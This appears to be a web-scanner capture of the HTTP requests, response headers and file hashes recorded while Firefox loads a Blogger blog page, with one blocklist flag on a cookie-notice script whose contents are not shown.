Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             104.18.11.207
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                            
Date: Mon, 28 Nov 2022 11:29:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
CDN-PullZone: 252412
CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
CDN-RequestCountryCode: DE
CDN-EdgeStorageId: 601, 617, 617
Last-Modified: Mon, 25 Jan 2021 22:04:53 GMT
CDN-CachedAt: 2021-08-03 04:14:00
CDN-RequestPullSuccess: True
CDN-RequestPullCode: 200
Cache-Control: public, max-age=31919000
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
x-content-type-options: nosniff
CDN-RequestId: 6358afe6e12aefed963ad27f3935d6d1
Content-Encoding: gzip
CDN-Status: 200
CDN-Cache: HIT
CF-Cache-Status: HIT
Age: 15081664
Server: cloudflare
CF-RAY: 7712c454a8a4b503-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  troff or preprocessor input, ASCII text, with very long lines (305)
Size:   4732
Md5:    09f17df615d193a0409fda81f54f582a
Sha1:   abd1f7828d7c6dc772e81d10847e06e69bfe790e
Sha256: c27d9ba94138c2aa687443778b5729cc2fc446b368feccd9ac512ceaabc7e4d7
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                        
                                             34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                            
access-control-allow-origin: *
access-control-expose-headers: Content-Type, Retry-After, Content-Length, Alert, Cache-Control, ETag, Pragma, Expires, Backoff, Last-Modified
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Mon, 28 Nov 2022 11:08:55 GMT
cache-control: public,max-age=3600
age: 1243
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            GET /earlyaccess/droidarabickufi.css HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             142.250.74.10
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                            
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Mon, 28 Nov 2022 11:29:38 GMT
Date: Mon, 28 Nov 2022 11:29:38 GMT
Cache-Control: private, max-age=86400
Cross-Origin-Opener-Policy: same-origin-allow-popups
Cross-Origin-Resource-Policy: cross-origin
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  ASCII text
Size:   290
Md5:    64d204801b32b765afa0403fe99a26d4
Sha1:   4efd5cc356cc4b174641d17ffcaaaf659a1720ea
Sha256: 57b7cc6770200d685eb8935c2fcb322b7fd14ba07b85f76bc2a63567c6fc3820
                                        
                                            GET /js/cookienotice.js HTTP/1.1 
Host: alraush.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/2015/05/blog-post-artimes-jarash-temple.html

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: text/javascript
                                            
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="blogger-tech"
Report-To: {"group":"blogger-tech","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/blogger-tech"}]}
Content-Length: 2026
Date: Mon, 28 Nov 2022 11:29:38 GMT
Expires: Mon, 05 Dec 2022 11:29:38 GMT
Cache-Control: public, max-age=604800
Last-Modified: Mon, 28 Nov 2022 10:50:16 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0


--- Additional Info ---
Magic:  ASCII text
Size:   2026
Md5:    c4e1ed83d89245089b8a1203be20a377
Sha1:   f3940e1215b89300ef97d57a25993f25243b8688
Sha256: afa801a129ff6fc98533118275db8a7d4a38fc91f8ab55ed4c19b864255e68d2

Blocklists:
  - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /static/v1/widgets/2504215749-css_bundle_v2_rtl.css HTTP/1.1 
Host: www.blogger.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.105
HTTP/2 200 OK
content-type: text/css
                                            
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="blogger-tech"
report-to: {"group":"blogger-tech","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/blogger-tech"}]}
content-length: 7780
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 23 Nov 2022 08:50:58 GMT
expires: Thu, 23 Nov 2023 08:50:58 GMT
cache-control: public, max-age=31536000
last-modified: Wed, 23 Nov 2022 07:50:07 GMT
age: 441520
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (35994)
Size:   7780
Md5:    80ce34d529819878a4a26584e8eec719
Sha1:   34e44bf7d3e11ab0ee1faf2cc5d2c7f7b9f053e2
Sha256: 625e3271a91189e54e12bd29994e693f26d45d83de700ce5e7b3db033fd1606f
                                        
                                            GET /static/v1/widgets/1535467126-widget_css_2_bundle.css HTTP/1.1 
Host: www.blogger.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.105
HTTP/2 200 OK
content-type: text/css
                                            
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="blogger-tech"
report-to: {"group":"blogger-tech","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/blogger-tech"}]}
content-length: 7452
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Fri, 25 Nov 2022 23:46:27 GMT
expires: Sat, 25 Nov 2023 23:46:27 GMT
cache-control: public, max-age=31536000
age: 214991
last-modified: Tue, 25 Nov 2014 14:03:24 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (35063), with no line terminators
Size:   7452
Md5:    f3167132833424a781f5270b052f9952
Sha1:   39916f5321955446feb471b2c6e5167cf65c8cac
Sha256: 78e311131a88573cc85996e817039c6d361730a065cd3332bed576e00657a482
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /static/v1/widgets/2342155703-widgets.js HTTP/1.1 
Host: www.blogger.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.105
HTTP/2 200 OK
content-type: text/javascript
                                            
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="blogger-tech"
report-to: {"group":"blogger-tech","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/blogger-tech"}]}
content-length: 56726
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Mon, 21 Nov 2022 16:02:03 GMT
expires: Tue, 21 Nov 2023 16:02:03 GMT
cache-control: public, max-age=31536000
last-modified: Mon, 21 Nov 2022 00:52:59 GMT
age: 588455
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (2221)
Size:   56726
Md5:    1217c8e34acb09c7cea97bae4d386ea1
Sha1:   55ee17703d0a7710943e93913bacb49220d98b4b
Sha256: c2f23437ab938096bf8b40de8b08c4f27bb880b7ef8588481ec5ccc08b58870b
                                        
                                            GET /js/platform.js HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.174
HTTP/2 200 OK
content-type: text/javascript
                                            
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-origin: *
content-security-policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gapi-team
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="gapi-team"
report-to: {"group":"gapi-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gapi-team"}]}
timing-allow-origin: *
content-length: 20984
date: Mon, 28 Nov 2022 11:29:38 GMT
expires: Mon, 28 Nov 2022 11:29:38 GMT
cache-control: private, max-age=1800, stale-while-revalidate=1800
etag: "7446758f13887885"
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1279)
Size:   20984
Md5:    7ac44ef24e267df17ff72f195b252806
Sha1:   62db12d9ce11a576ccd7fa3544d851c5fd42f3b7
Sha256: aae7897e7b55999c1b3166309381d19ac488dced51e14071339d8b193a686a61
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Accept-Ranges: bytes
Age: 880
Cache-Control: max-age=165117
Date: Mon, 28 Nov 2022 11:29:38 GMT
Etag: "63847a2f-1d7"
Expires: Wed, 30 Nov 2022 09:21:35 GMT
Last-Modified: Mon, 28 Nov 2022 09:06:55 GMT
Server: ECS (ska/F717)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /_/scs/abc-static/_/js/k=gapi.lb.en.geaHZXF2-fw.O/m=gapi_iframes,gapi_iframes_style_bubble/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9yYF5eCIYPx4UH9gpJptM2Q_GGxQ/cb=gapi.loaded_0?le=scs HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://alraush.blogspot.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.174
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
                                            
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="social-frontend-mpm-access"
report-to: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
content-length: 57794
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 23 Nov 2022 09:56:18 GMT
expires: Thu, 23 Nov 2023 09:56:18 GMT
cache-control: public, max-age=31536000
last-modified: Tue, 01 Nov 2022 15:24:55 GMT
age: 437600
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (580)
Size:   57794
Md5:    813b15c3004464f6bd39fd0773b04757
Sha1:   bd2218fe1e647f61132aad70d29cd91fd0416f26
Sha256: 446c6d83404c0fc4bc1ca6e1c0895f9400309185a534b3f4b6d500e668efeadf
                                        
                                            GET /pagead/js/google_top_exp.js HTTP/1.1 
Host: pagead2.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             142.250.74.130
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                            
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: cafe
Content-Length: 67
X-XSS-Protection: 0
Date: Mon, 28 Nov 2022 10:51:15 GMT
Expires: Mon, 12 Dec 2022 10:51:15 GMT
Cache-Control: public, max-age=1209600
Age: 2303
ETag: 13036835877489095579


--- Additional Info ---
Magic:  ASCII text
Size:   67
Md5:    9bbc3ca32ec951a484589ce0e6b4db73
Sha1:   753d6f6183b33b2dee5dde2208fca91c17f5bb13
Sha256: b8f16a16d2a7ea39a9cc079fdbe3af7d31393d62a853668bdd549e0a0311cb3c
                                        
                                            GET /ea/droidarabickufi/v6/DroidKufi-Bold.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://alraush.blogspot.com
Connection: keep-alive
Referer: http://fonts.googleapis.com/

                                        
                                             216.58.207.195
HTTP/1.1 200 OK
Content-Type: font/woff2
                                            
Accept-Ranges: bytes
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 31544
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 24 Nov 2022 09:37:29 GMT
Expires: Fri, 24 Nov 2023 09:37:29 GMT
Cache-Control: public, max-age=31536000
Age: 352329
Last-Modified: Wed, 13 Aug 2014 16:50:04 GMT


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 31544, version 1.0\012- data
Size:   31544
Md5:    4650b9f9ddfc876d3fde0a9663539522
Sha1:   7dc2e4b8c259f1bb4d98ec64a39645373d31d71e
Sha256: 31f02fb9a8ae77e5d8bb229bf73f473f783e8155042655926cafca211cd11c98
                                        
                                            GET /ea/droidarabickufi/v6/DroidKufi-Regular.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://alraush.blogspot.com
Connection: keep-alive
Referer: http://fonts.googleapis.com/

                                        
                                             216.58.207.195
HTTP/1.1 200 OK
Content-Type: font/woff2
                                            
Accept-Ranges: bytes
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 31248
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Fri, 25 Nov 2022 04:47:52 GMT
Expires: Sat, 25 Nov 2023 04:47:52 GMT
Cache-Control: public, max-age=31536000
Age: 283306
Last-Modified: Wed, 13 Aug 2014 16:50:04 GMT


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 31248, version 1.0\012- data
Size:   31248
Md5:    436938da6ed799ca17110e719e4d2e51
Sha1:   b7ef31b6085a9f0963dffe7939abca527724d389
Sha256: a7b09bb9c8e8e2fb189204e08ed94bd8096c118780b5e926847cf2748ca7c5c2
                                        
                                            GET /font-awesome/4.0.3/fonts/fontawesome-webfont.woff?v=4.0.3 HTTP/1.1 
Host: netdna.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://alraush.blogspot.com
Connection: keep-alive
Referer: http://netdna.bootstrapcdn.com/

                                        
                                             104.18.11.207
HTTP/1.1 200 OK
Content-Type: font/woff
                                            
Date: Mon, 28 Nov 2022 11:29:38 GMT
Content-Length: 44432
Connection: keep-alive
CDN-PullZone: 252412
CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
CDN-RequestCountryCode: DE
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=31919000
ETag: "3293616ec0c605c7c2db25829a0a509e"
Last-Modified: Mon, 25 Jan 2021 22:04:53 GMT
CDN-CachedAt: 11/18/2022 06:18:51
CDN-ProxyVer: 1.03
CDN-RequestPullCode: 200
CDN-RequestPullSuccess: True
CDN-EdgeStorageId: 1049
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
CDN-Status: 200
CDN-RequestId: dab39696ae1969865d0cdffdc1ea9e82
CDN-Cache: HIT
CF-Cache-Status: HIT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7712c4569d56b4ff-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  Web Open Font Format, TrueType, length 44432, version 1.0\012- data
Size:   44432
Md5:    3293616ec0c605c7c2db25829a0a509e
Sha1:   04c3bf56d87a0828935bd6b4aee859995f321693
Sha256: 0fd28fece9ebd606b8b071460ebd3fc2ed7bc7a66ef91c8834f11dfacab4a849
                                        
                                            GET /-3Lw6lRVxZRc/VVTAU04BPvI/AAAAAAAAAXw/7U_cysAKIZM/s72-c/images22.jpg HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v17d"
Expires: Tue, 29 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="images22.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:38 GMT
Server: fife
Content-Length: 3258
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   3258
Md5:    f78dc20aba72d6e2ae5f68ecd3053ddb
Sha1:   5f8229848c43e03ae925e5526728d0bea671eea1
Sha256: 73816c67f3909197667c6635e68f065fe1cdba40031d95d6fe92f4749a52876d
                                        
                                            GET /b/stats?style=BLACK_TRANSPARENT&timeRange=ALL_TIME&token=APq4FmBTABLf-pgNh1lsVtmehXOrVfQ1dEaFfEr6IXgtU1DhuwwG1nC5jeZWjZLSY2hIYH7775-7hALCPpN-gT5owd9dg29KqA HTTP/1.1 
Host: alraush.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/2015/05/blog-post-artimes-jarash-temple.html

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                            
Content-Encoding: gzip
Date: Mon, 28 Nov 2022 11:29:38 GMT
Expires: Mon, 28 Nov 2022 11:29:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 266
Server: GSE


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (410), with no line terminators
Size:   266
Md5:    25f4a202120c1cdd83604c550349e9f3
Sha1:   4b682e03cfbb6b26d51e09f71542536d6221b894
Sha256: 573ef7e55579f11ed78c7d451f0f0e09f6e4d72748aec640e2ba9820ac7e8854
                                        
                                            GET /-bny8DJS3y44/VRwnFDOPNfI/AAAAAAAAAKU/k3HnREdN1U4/s72-c/200.jpg HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             142.250.74.161
